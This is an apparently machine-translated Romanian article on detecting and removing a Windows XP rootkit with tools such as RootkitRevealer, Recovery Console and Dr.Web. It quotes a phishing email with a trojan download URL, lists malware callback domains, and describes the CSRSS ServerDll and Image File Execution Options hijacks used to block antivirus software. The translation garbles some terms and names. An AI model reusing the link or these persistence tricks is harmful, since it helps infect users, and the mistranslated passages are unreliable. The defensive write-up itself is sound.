& nbsp & nbsp Eliminarea unui virus „de înaltă calitate” devine o sarcină din ce în ce mai netrivială, deoarece dezvoltatorii oferă unui astfel de virus proprietăți care îngreunează cât mai mult posibil rezolvarea acestuia. Adesea, un virus poate funcționa în modul kernel și are capacități nelimitate de a intercepta și modifica funcțiile sistemului. Cu alte cuvinte, virusul are capacitatea de a-și ascunde fișierele, cheile de registry, conexiunile la rețea de la utilizator (și de antivirus) - tot ceea ce poate fi un semn al prezenței sale pe sistemul infectat. Poate ocoli orice firewall, sisteme de detectare a intruziunilor și analizoare de protocol. Și mai presus de toate, poate rula și în modul Windows Safe Boot. Cu alte cuvinte, malware-ul modern este foarte greu de detectat și neutralizat.
& nbsp & nbsp De asemenea, dezvoltarea antivirusurilor nu stă pe loc - acestea sunt în mod constant îmbunătățite și, în majoritatea cazurilor, vor putea detecta și neutraliza malware-ul, dar mai devreme sau mai târziu, va avea loc o modificare a virusului care va fi prea dur pentru orice antivirus de ceva timp. Prin urmare, autodetecția și eliminarea unui virus este o sarcină care mai devreme sau mai târziu va trebui să fie efectuată de orice utilizator de computer.
Buna ziua.
Suntem interesați de candidatura dumneavoastră, dar vă sugerăm să completați
CV-ul nostru cu antet și trimite-l la [email protected]
Răspunsul nu este garantat, dar dacă CV-ul tău ne interesează, noi
te sunăm în câteva zile. Nu uita
indicați numărul de telefon, precum și postul pentru care aplicați. De dorit
indicați de asemenea dorințele de salariu.
Puteți descărca antetul nostru de la linkul de mai jos.
http://verano-konwektor.pl/resume.exe
& nbsp & nbsp Analiza antetelor de e-mail a arătat că acesta a fost trimis de la un computer din Brazilia printr-un server din Statele Unite. Și antetul este propus să fie descărcat de pe un server din Polonia. Și asta cu conținut în limba rusă.
& nbsp & nbsp Este clar că nu veți vedea niciun antet și, cel mai probabil, veți primi un program troian pe computer.
& nbsp & nbsp Descărcați fișierul resume.exe. Dimensiunea este de 159744 octeți. Nu îl lansez încă.
& nbsp & nbsp Copiez fișierul pe alte computere unde sunt instalate diverse antivirusuri - doar pentru o altă verificare a eficienței lor. Rezultatele nu sunt atât de fierbinți - antivirusul Avast 4.8 Home Edition păstrat delicat tăcut. Symantec a strecurat-o "y - aceeași reacție. Doar AVG 7.5 Free Edition a funcționat. Se pare că acest antivirus, de fapt, câștigă popularitate dintr-un motiv.
& nbsp & nbsp Toate experimentele sunt efectuate pe o mașină virtuală cu sistemul de operare Windows XP. Un cont cu drepturi de administrator, deoarece, de cele mai multe ori, virușii sunt introduși cu succes în sistem doar dacă utilizatorul este administrator local.
& nbsp & nbsp Alergare. După ceva timp, fișierul infectat a dispărut, se pare că virusul și-a început fapta murdară.
& nbsp & nbsp Comportamentul sistemului nu s-a schimbat extern. Evident, este nevoie de o repornire. Pentru orice eventualitate, interzic conexiunile TCP în firewall. Las permise numai conexiuni UDP de ieșire: 53 (DNS) - trebuie să lăsați virusului măcar o oportunitate de a-și arăta activitatea. De regulă, după introducere, virusul trebuie să contacteze gazda sau un anumit server de pe Internet, ceea ce va fi indicat prin interogări DNS. Deși, din nou, în lumina celor de mai sus, un virus inteligent îi poate masca, poate ocoli și un firewall. Privind în viitor, voi spune că în acest caz particular acest lucru nu s-a întâmplat, dar pentru o analiză fiabilă a activității rețelei, este mai bine să trimiteți tot traficul unei mașini infectate printr-o alta, neinfectată, unde puteți fi sigur că Regulile de firewall sunt respectate, iar analizorul de trafic (am folosit Wireshark) arată ce este cu adevărat.
& nbsp & nbsp Reporniți. În exterior, nimic nu s-a schimbat, cu excepția faptului că este imposibil să accesezi internetul, deoarece eu însumi am dezactivat această posibilitate. Nu a apărut nimic nou în căile de pornire automată, în servicii sau în cataloagele de sistem. Vizualizarea jurnalului de sistem oferă un singur sfat - sistemul nu a putut porni serviciul misterios mare48... Nu puteam avea un astfel de serviciu, iar în timp acest eveniment a coincis cu momentul implementării. Ce altceva ar sugera o implementare cu succes este lipsa unei intrări de registry pentru serviciul grande48 și absența unui al doilea mesaj în jurnalul de sistem că serviciul nu a pornit după repornire. Acesta este cel mai probabil un defect al scriitorilor de viruși. Deși este nesemnificativ, deoarece majoritatea utilizatorilor nu vizualizează jurnalul de evenimente, iar în momentul suspiciunii de infecție, această intrare din jurnal poate fi deja absentă.
Determinăm prezența unui virus în sistem.
1. & nbsp & nbsp Cu siguranță ar trebui să existe trafic „stânga”. Poate fi determinat folosind analizoare de protocol. Am folosit Wireshark. Imediat după încărcare, îl lansez mai întâi. Totul este corect, există un grup de interogări DNS (după cum s-a dovedit - o dată la 5 minute) pentru a determina adresele IP ale nodurilor ysiqiyp.com, irgfqfyu.com, updpqpqr.com etc. De fapt, tuturor sistemelor de operare Windows le place să meargă online atunci când este necesar și nu este necesar, antivirusurile își pot actualiza bazele de date, așa că este destul de dificil să se stabilească dacă traficul aparține unui virus. De obicei, este necesar să treacă traficul printr-o mașină neinfectată și să analizeze serios conținutul acesteia. Dar acesta este un subiect separat. În principiu, un semn indirect de anomalie în activitatea de rețea a sistemului poate fi valori semnificative ale contoarelor de trafic ale furnizorului, în timpul opririi sistemului, contoare din proprietățile conexiunii VPN etc.
2. & nbsp & nbsp Să încercăm să folosim programe pentru a căuta rootkit-uri. Acum există deja o mulțime de astfel de programe și sunt ușor de găsit pe net. Unul dintre cele mai populare este Mark Russinovich, care poate fi descărcat din secțiunea Windows Sysinternals a site-ului Microsoft. Nu necesită instalare. Dezarhivați și rulați. Faceți clic pe „Scanați”. După o scurtă scanare, vedem rezultatele:
& nbsp & nbsp Apropo, fără măcar să aprofundați în conținutul rândurilor, puteți observa imediat că există înregistrări sau fișiere care sunt foarte „proaspete” în momentul creării/modificării (coloana "Timestamp-ul")... În primul rând, ar trebui să ne intereseze fișierele cu descrierea (coloana "Descriere") - „Ascuns de API-ul Windows”- Ascuns de API-ul Windows. Ascunderea fișierelor, a intrărilor de registry, a aplicațiilor nu este, desigur, normală. Doua fisiere - grande48.sys
și Yoy46.sys
- tocmai asta căutăm. Acesta este rootkit-ul căutat sau o parte a acestuia înregistrată sub masca driverelor, care oferă furt. Prezența celorlalți de pe listă a fost o surpriză pentru mine. Testul a arătat că acestea sunt drivere normale pentru Windows XP. În plus, virusul și-a ascuns prezența doar în dosar \ system32
, și copiile acestora în \ system32 \ dllcache
rămase vizibile.
& nbsp & nbsp Permiteți-mi să vă reamintesc că Windows XP folosește un mecanism special pentru a proteja fișierele de sistem, numit Windows File Protection (WFP)... Scopul WFP este de a restaura automat fișierele importante de sistem atunci când sunt șterse sau înlocuite cu copii învechite sau nesemnate. Toate fișierele de sistem Windows XP sunt semnate digital și listate într-o bază de date specială utilizată de WFP. Folderul este folosit pentru a stoca copii ale fișierelor. \ system32 \ dllcache
și, parțial, \ Windows \ cache de drivere
... Când ștergeți sau înlocuiți unul dintre fișierele de sistem, WFP copiază automat copia „corectă” a acestuia din folderul \ dllcache. Dacă fișierul specificat nu se află în folderul \ dllcache, Windows XP vă solicită să introduceți CD-ul de instalare Windows XP în unitatea CD-ROM. Încercați să ștergeți vga.sys din \system32, iar sistemul îl va restabili imediat folosind copia din dllcache. Și situația în care, atunci când sistemul de recuperare a fișierelor rulează, fișierul driver este în \ dllcache și nu este vizibil în \ system32 - acesta este, de asemenea, un semn suplimentar al prezenței unui rootkit în sistem.
Îndepărtăm virusul din sistem.
& nbsp & nbsp Rămâne de efectuat cea mai importantă acțiune - eliminarea virusului. Cel mai simplu și mai fiabil mod este să porniți într-un alt sistem de operare, neinfectat și să împiedicați pornirea driverelor rootkit.
Să folosim Consola de recuperare Windows standard. Luați discul de instalare Windows XP și porniți de pe acesta. Pe primul ecran, selectați al 2-lea element de meniu - apăsați R.
Alegem un sistem (dacă sunt mai multe):
Introduceți parola de administrator.
O listă de drivere și servicii poate fi vizualizată folosind comanda listsvc:
Într-adevăr, lista conține Yoy46 , deși grande48 lipsește, ceea ce înseamnă că fișierul driver grande48.sys este ascuns în sistem, dar nu se încarcă:
Consola de recuperare vă permite să preveniți sau să permiteți pornirea driverelor și a serviciilor folosind comenzile dezactivațiși permite... Interzicem pornirea Yoy46 cu comanda:
& nbsp & nbsp Lansăm comanda EXIT și sistemul se repornește.
După o repornire, driverul de rootkit nu va fi încărcat, ceea ce va ușura ștergerea fișierelor și ștergerea registrului din intrările sale. O poți face manual sau poți folosi un fel de antivirus. Cel mai eficient, după părerea mea, va fi un scaner gratuit bazat pe binecunoscutul antivirus Dr.Web Igor Danilov. Îl puteți descărca de aici - http://freedrweb.ru
& nbsp & nbsp De asemenea, puteți descărca „Dr.Web LiveCD” - o imagine de disc care vă permite să restabiliți funcționarea sistemului afectat de viruși pe stațiile de lucru și serverele care rulează Windows \ Unix, să copiați informații importante pe medii amovibile sau pe alt computer , dacă acțiunile programelor rău intenționate au făcut imposibilă pornirea computerului. Dr.Web LiveCD nu numai că va ajuta la curățarea computerului de fișiere infectate și suspecte, dar va încerca și să vindece obiectele infectate. Pentru a elimina virusul, trebuie să descărcați imaginea (fișierul cu extensia .iso) de pe site-ul DrWeb și să o inscripționați pe un CD. Va fi creat un disc bootabil, pornind de pe care, ghidat de un meniu simplu și intuitiv.
& nbsp & nbsp Dacă din anumite motive nu este posibil să utilizați Dr.Web LiveCD, puteți încerca scanerul antivirus Dr.Web CureIt!, care poate fi lansat prin pornirea într-un alt sistem de operare, de exemplu, folosind Winternals ERD Comandant. Pentru a scana un sistem infectat, este necesar să specificați hard disk-ul acestuia (modul „Scanare personalizată”). Scanerul vă va ajuta să găsiți fișierele virusului și tot ce trebuie să faceți este să ștergeți din registru intrările asociate cu acesta.
& nbsp & nbsp Deoarece virușii au învățat să se înregistreze pentru a rula în modul de pornire sigură, nu strica să verificați ramura de registry:
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ SafeBoot
Secțiuni:
Minim- o listă de drivere și servicii rulate în Safe Mode
Reţea- la fel, dar cu suport de rețea.
Permiteți-mi să adaug că există o nouă clasă rootkit reprezentată de BackDoor.MaosBoot, care a apărut la sfârșitul anului 2007. Acest program troian se scrie în sectorul de pornire al hard diskului și oferă instalarea ascunsă a driverului său în memorie. Driverul Rootkit în sine este scris direct în ultimele sectoare ale discului fizic, ocolind sistemul de fișiere, care își ascunde prezența pe disc. În general, principiul nu este nou, acum zece ani, malware-ul a fost mascat în acest fel pe pistele de rezervă ale dischetelor și hard disk-urilor, dar s-a dovedit a fi foarte eficient, deoarece majoritatea antivirusurilor încă nu pot face față sarcinii de eliminare. BackDoor.MaosBoot. Sectorul de boot menționat mai sus nu verifică, iar sectoarele de la capătul discului pentru acesta nu au nicio legătură cu sistemul de fișiere și, desigur, nu va detecta un astfel de rootkit. Adevărat, Dr.Web (și, prin urmare, Cureit) se descurcă bine cu BackDoor.MaosBoot.
& nbsp & nbsp Dacă aveți îndoieli cu privire la un fișier, puteți utiliza serviciul antivirus online gratuit virustotal.com. Utilizați un formular special de pe pagina principală a site-ului pentru a încărca un fișier suspect și așteptați rezultatele. Virustotal utilizează versiuni de consolă ale multor antivirusuri pentru a vă scana fișierul suspect. Rezultatele sunt afișate pe ecran. Dacă fișierul este rău intenționat, atunci cu un grad ridicat de probabilitate, îl veți putea determina. Într-o oarecare măsură, serviciul poate fi folosit pentru a selecta „cel mai bun antivirus”.
un link către unul dintre firele de forum virusinfo.info, unde utilizatorii postează link-uri către diverse resurse dedicate protecției antivirus, inclusiv. și online - vă verifică computerul, browserul, fișierele...
& nbsp & nbsp Uneori, ca urmare a acțiunilor incorecte ale unui virus (sau antivirus), sistemul oprește în general încărcarea. Permiteți-mi să vă dau un exemplu tipic. Programele rău intenționate încearcă să se infiltreze în sistem folosind diverse metode, inclusiv destul de neobișnuite. În timpul procesului inițial de pornire, chiar înainte ca utilizatorul să fie înregistrat, se lansează Managerul de sesiune (\ SystemRoot \ System32 \ smss.exe), a cărui sarcină este să pornească subsistemele și serviciile (serviciile) de nivel înalt ale sistemului de operare. În această etapă, sunt pornite procesele CSRSS (Client Server Runtime Process), WINLOGON (Windows Logon), LSASS (LSA shell) și restul serviciilor cu parametrul Start = 2 din cheia de registry.
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services
& nbsp & nbsp Informațiile specifice Managerului de sesiune se află în cheia de registry
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Manager de sesiune
Una dintre modalitățile de a-l introduce în sistem este înlocuirea fișierului dll pentru CSRSS. Dacă te uiți la conținutul postării
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Session Manager \ SubSystems
Veți găsi semnificațiile
ServerDll = baserv, ServerDll = winsrv... Bibliotecile basesrv.dll și winsrv.dll sunt fișierele de sistem „corecte” încărcate de serviciul CSRSS pe un sistem normal (neinfectat). Această intrare din registru poate fi corectată la o intrare care oferă încărcare, de exemplu, în loc de baserv.dll, malițiosul basepvllk32.dll:
ServerDll = basepvllk32 (sau un alt dll, altul decât basesrv și winsrv)
Acest lucru va asigura, la următoarea repornire, că malware-ul este sub control. Dacă antivirusul dvs. detectează și elimină basepvllk32 încorporat, lăsând intactă intrarea din registry, atunci pornirea sistemului se va încheia cu un „ecran albastru al morții” (BSOD) cu eroarea STOP c000135 și un mesaj despre incapacitatea de a încărca basepvllk32.
Puteți corecta situația astfel:
Acesta va porni în consola de recuperare (sau în orice alt sistem) și va copia fișierul baserv.dll din folderul C:\WINDOWS\system32 în același folder sub numele basepvllk32.dll. După aceea, sistemul va porni și puteți corecta manual intrarea din registry.
- porniți folosind Winternals ERD Commander și remediați intrarea în registry ServerDll = baserv... Sau derulați înapoi sistemul folosind un punct de restaurare.
& nbsp & nbsp Un alt exemplu tipic. Malware-ul se înregistrează ca depanator pentru procesul explorer.exe prin crearea unei intrări în registru precum:
„Debugger” = „C:\Fișiere de program\Microsoft Common\wuauclt.exe”
Eliminarea wuauclt.exe de către antivirus fără a șterge intrarea din registry face ca explorer.exe să nu poată porni. Ca rezultat, ajungi cu un desktop gol, fără butoane sau comenzi rapide. Puteți ieși din situație folosind combinația de taste CTRL-ALT-DEL. Selectați „Task Manager” - „New Task” - „Browse” - găsiți și rulați editorul de registry regedit.exe. Apoi scoateți cheia
HKM \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ explorer.exe
și reporniți.
& nbsp & nbsp În cazul în care știți exact când a fost infectat sistemul, revenirea la un punct de restaurare înainte de acest eveniment este o modalitate destul de fiabilă de a scăpa de infecție. Uneori, este logic să efectuați nu o derulare completă, ci una parțială, cu restaurarea fișierului de registry SYSTEM, așa cum este descris în articolul „Probleme la încărcarea sistemului de operare” din secțiunea „Windows”
& nbsp & nbsp == mai 2008. ==
Plus
& nbsp & nbsp Acest supliment a apărut la aproximativ un an după ce a fost scris articolul principal. Aici am decis să postez cele mai interesante soluții care au apărut în procesul de combatere a software-ului rău intenționat. Ceva de genul unor note scurte.
După eliminarea virusului, niciun antivirus nu funcționează.
& nbsp & nbsp Cazul este interesant prin faptul că metoda de blocare a software-ului antivirus poate fi folosită în lupta împotriva fișierelor executabile ale virușilor. Totul a început cu faptul că, după eliminarea unui virus destul de primitiv, Stream Anti-Virus licențiat nu a funcționat. Reinstalările cu curățarea registrului nu au ajutat. O încercare de a instala Avira Antivir Personal Free sa încheiat cu succes, dar antivirusul în sine nu a pornit. A existat un mesaj de timeout în syslog la pornirea serviciului „Avira Antivir Guard”. Repornirea manuală s-a soldat cu aceeași eroare. Mai mult, nu au fost efectuate procese inutile în sistem. Era o sută la sută certitudine - nu existau viruși, rootkit-uri și alte lucruri urâte (Malware) în sistem.
& nbsp & nbsp La un moment dat am încercat să rulez utilitarul antivirus AVZ. Principiul funcționării AVZ se bazează în mare măsură pe căutarea diferitelor anomalii în sistemul studiat. Pe de o parte, ajută la căutarea programelor malware, dar, pe de altă parte, suspiciunile cu privire la componentele antivirus, antispyware și alte software-uri legitime care interacționează activ cu sistemul sunt destul de naturale. Pentru a suprima răspunsul AVZ la obiectele legitime și pentru a simplifica analiza rezultatelor scanării sistemului prin marcarea obiectelor legitime cu culoare și filtrarea lor din jurnale, este utilizată baza de date a fișierelor sigure AVZ. Recent, a fost lansat un serviciu complet automat, care permite tuturor să trimită fișiere pentru a completa această bază de date.
Dar: fișierul executabil avz.exe nu a pornit! Redenumiți avz.exe în musor.exe - totul începe bine. Încă o dată, AVZ s-a dovedit a fi un asistent de neînlocuit în rezolvarea problemei. La efectuarea verificărilor, în rezultate au apărut următoarele rânduri:
Periculos - depanator de procese „avz.exe” = „ntsd-d”
Periculos - depanator de procese „avguard.exe” = „ntsd-d”
:.
Acesta a fost deja o pistă serioasă. Căutarea în registru pentru contextul „avz” a dus la o ramură
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Opțiuni de execuție a fișierului imagine
Secțiunea numită avz.exe care conține un parametru șir numit "Depanator"și valoare.
Și, după cum s-a dovedit mai târziu, această ramură conținea nu numai secțiunea „avz.exe”, ci și secțiuni cu numele modulelor executabile ale aproape tuturor antivirusurilor cunoscute și unele utilitare de monitorizare a sistemului. Ntsd.exe în sine este un depanator Windows complet legal, care este standard în toate versiunile de sistem de operare, dar o astfel de intrare în registru face imposibilă pornirea aplicației, numele fișierului executabil al cărui nume coincide cu numele ?? ?. Secțiunea exe.
& nbsp & nbsp După ștergerea tuturor cheilor numite ???.exe și care conțineau intrarea „Debugger” = „ntsd -d” din registry, sistemul s-a recuperat complet.
Ca urmare a analizei situației cu utilizarea parametrului „ntsd -d” pentru a bloca lansarea fișierelor executabile, a venit ideea de a folosi aceeași tehnică pentru combaterea virușilor înșiși. Desigur, acesta nu este un panaceu, dar într-o oarecare măsură poate reduce amenințarea de a vă infecta computerul cu viruși cu nume cunoscute de fișiere executabile. Pentru a face imposibilă executarea fișierelor cu numele ntos.exe, file.exe, system32.exe etc. pe sistem. puteți crea un fișier reg pentru a fi importat în registry:
Windows Registry Editor versiunea 5.00
„Depanator” = „ntsd -d”
„Depanator” = „ntsd -d”
„Depanator” = „ntsd -d”
:.. etc.
Vă rugăm să rețineți că numele secțiunii nu conține calea fișierului, astfel încât această metodă nu poate fi utilizată pentru fișierele cu virus ale căror nume coincid cu numele fișierelor executabile legale, dar fișierele în sine nu sunt localizate în mod standard în sistemul de fișiere. De exemplu, explorer Explorer.exe se află în folderul \ WINDOWS \, iar virusul este situat în altă parte - în rădăcina discului, în folderul \ temp, \ windows \ system32 \. Dacă creați o partiție numită „Explorer.exe”, apoi după conectare, veți obține un desktop gol, deoarece exploratorul nu va porni. Și mai rău, dacă creați o partiție care are același nume cu serviciul de sistem (winlogon.exe, csrss.exe, smss.exe, services.exe, lsass.exe), veți avea un sistem prăbușit. Dacă virusul este localizat în C: \ temp \ winlogon.exe, iar modulul legal de conectare este C: \ WINDOWS \ SYSTEM32 \ winlogon.exe, crearea unei partiții numită winlogon.exe va duce la imposibilitatea de a porni serviciul winlogon și blocați sistemul cu un ecran albastru al morții (BSOD).
& nbsp & nbsp Dar, cu toate acestea, nu merită să sperăm că codul cerut de virus se va potrivi în fiecare caz concret. Deoarece nu ar trebui să sperați la o autodistrugere sinceră a virusului, și cu atât mai mult, nu ar trebui să trimiteți SMS-uri. Orice virus poate fi eliminat, chiar dacă nu este detectat de software-ul antivirus. Metodele de eliminare a ransomware-ului nu sunt diferite de metodele de eliminare a oricărui alt software rău intenționat, cu o, poate, diferență - nu ar trebui să pierdeți timpul încercând să faceți față cu gunoiul în mediul unui sistem infectat, decât pentru a vă dezvolta propriile abilități și a completa. cunoştinţe.
Cea mai simplă și eficientă modalitate este să pornești folosind un sistem diferit, neinfectat și, după ce te-ai conectat la cel infectat, să ștergi fișierele cu virus și să repari intrările din registry. Am scris deja despre asta mai sus, în partea principală a articolului, și aici voi încerca să subliniez doar câteva scurte opțiuni pentru eliminarea virusului.
Utilizarea Dr.Web LiveCD este cea mai simplă metodă care nu necesită cunoștințe speciale. Descărcați imaginea ISO CD, inscripționați-o pe disc, porniți de pe CD-ROM și rulați scanerul. Folosind Winternals ERD Commander. Porniți de pe acesta, vă conectați la sistemul infectat și reveniți la un punct de control de recuperare cu o dată la care nu a existat încă nicio infecție. Alegeți meniul Instrumente de sistem - Restaurare sistem... Dacă nu puteți derula înapoi folosind ERD Commander, încercați să găsiți manual fișierele de registry în datele punctului de control și să le restaurați în directorul Windows.Am descris în detaliu în articolul „Lucrul cu registry”. Pornirea la un alt sistem de operare și eliminarea manuală a virușilor. Cel mai dificil, dar cel mai eficient mod. Cel mai convenabil este să utilizați același ERD Commander ca un alt sistem de operare. Metoda de detectare și eliminare a unui virus poate fi următoarea:
Accesați discul sistemului infectat și scanați cataloagele de sistem pentru fișiere executabile și fișiere driver cu o dată de creare apropiată de data infecției. Mutați aceste fișiere într-un folder separat. Acordați atenție directoarelor
\ Windows
\ Windows \ system32
\ Windows \ system32 \ drivere
\ Windows \ Sarcini \
\ RECICLATOR
\ Informații despre volumul sistemului
Directoare de utilizatori \ Documente și setări \ Toți utilizatoriiși \ Documente și setări \ nume de utilizator
Este foarte convenabil să folosiți FAR Manager pentru a căuta astfel de fișiere, cu sortarea după dată activată pentru panoul în care este afișat conținutul directorului (combinația CTRL-F5). Acordați o atenție deosebită fișierelor executabile ascunse. Există, de asemenea, un utilitar eficient și simplu de la Nirsoft - SearchMyFiles, a cărui utilizare permite, în majoritatea covârșitoare a cazurilor, detectarea cu ușurință a fișierelor rău intenționate chiar și fără a utiliza un antivirus. Metodă de detectare a fișierelor rău intenționate în funcție de momentul creării (ora de creare)
Conectați-vă la registrul sistemului infectat și căutați legături către numele acestor fișiere. Registrul în sine nu interferează cu pre-copierea (complet sau cel puțin acele părți în care se găsesc link-urile de mai sus). Puteți șterge legăturile sau puteți schimba numele fișierelor din ele în altele, de exemplu - fișier.exe în fișier.ex_, server.dll în server.dl_, driver.sys în driver.sy_.
Această metodă nu necesită cunoștințe speciale, iar în cazurile în care virusul nu modifică data de modificare a fișierelor sale (ceea ce este încă foarte rar), are un efect pozitiv. Chiar dacă virusul nu este detectat de software-ul antivirus.
Dacă metodele anterioare au eșuat, rămâne un lucru - o căutare manuală a posibilelor variante ale lansării virusului. În meniu Instrumente administrative Comandantul ERD „și există articole:
Autoruns- informații despre parametrii de lansare a aplicației și shell-ul utilizatorului.
Manager de service și șofer- informații despre servicii și drivere de sistem.
Programele antivirus speciale sunt responsabile de lupta împotriva virușilor informatici. Ei sunt obligați să elimine automat toți virușii de pe computer. Dar uneori programele antivirus nu „văd” și lasă să treacă noi viruși, șterg fișierele infectate cu virusul care sunt vitale pentru noi. Toate acestea duc la necesitatea de a învăța cum să eliminați manual programele rău intenționate pe cont propriu.
Cel mai important lucru în lupta împotriva virușilor informatici (la fel ca în cazul celor obișnuiți) este să îi detectăm la timp și să îi preveniți. Se întâmplă ca, în ciuda antivirusului instalat, computerul să fie infectat. Cum știi dacă computerul tău este infectat? Mulți viruși se comportă foarte liniștit la început. Observați că computerul funcționează mult mai lent, încetinește, dă erori de neînțeles. Există o premoniție de necaz - totul merge cumva greșit. Începeți imediat să căutați posibili viruși. Mulți utilizatori experimentați vă sfătuiesc să vă asigurați că rulați programul antivirus în modul sigur. Pentru a face acest lucru, la începutul pornirii sistemului, apăsați tasta „F8” (foarte rapid, de mai multe ori) pentru a merge la selecția modului de pornire. Selectați „Mod sigur”, este mai dificil pentru viruși să se mascheze. Este mai probabil să scapi de intruși cu un program antivirus. Fiecare are propriile preferințe, dar cel mai adesea utilizatorii aleg „NOD32” ca program antivirus. Intrați în meniul antivirusului dvs.: faceți dublu clic pe pictograma acestuia din bara de activități. Actualizați baza de date antivirus. Apoi, în fereastra principală, găsiți linia „Scanare PC”, faceți clic pe subelementul „Scanare personalizată”. Se va deschide o fereastră pentru selectarea obiectelor scanate. Verificați toate dispozitivele unde pot fi viruși: RAM, unități locale, dispozitive de stocare externe (dacă sunt conectate). Faceți clic pe Scanare.
În lupta împotriva virușilor, trebuie să acționați hotărât și să aplicați diverse metode de verificare a computerului. După scanarea cu programul antivirus instalat, verificați din nou toate discurile cu utilitarul Dr.Web CureIt. Descărcați-l online gratuit. Dacă anti-virusul principal este Dr.Web, atunci descărcați un alt utilitar - AVPTool. Nu uitați să faceți în mod regulat copii ale informațiilor importante pe medii externe.
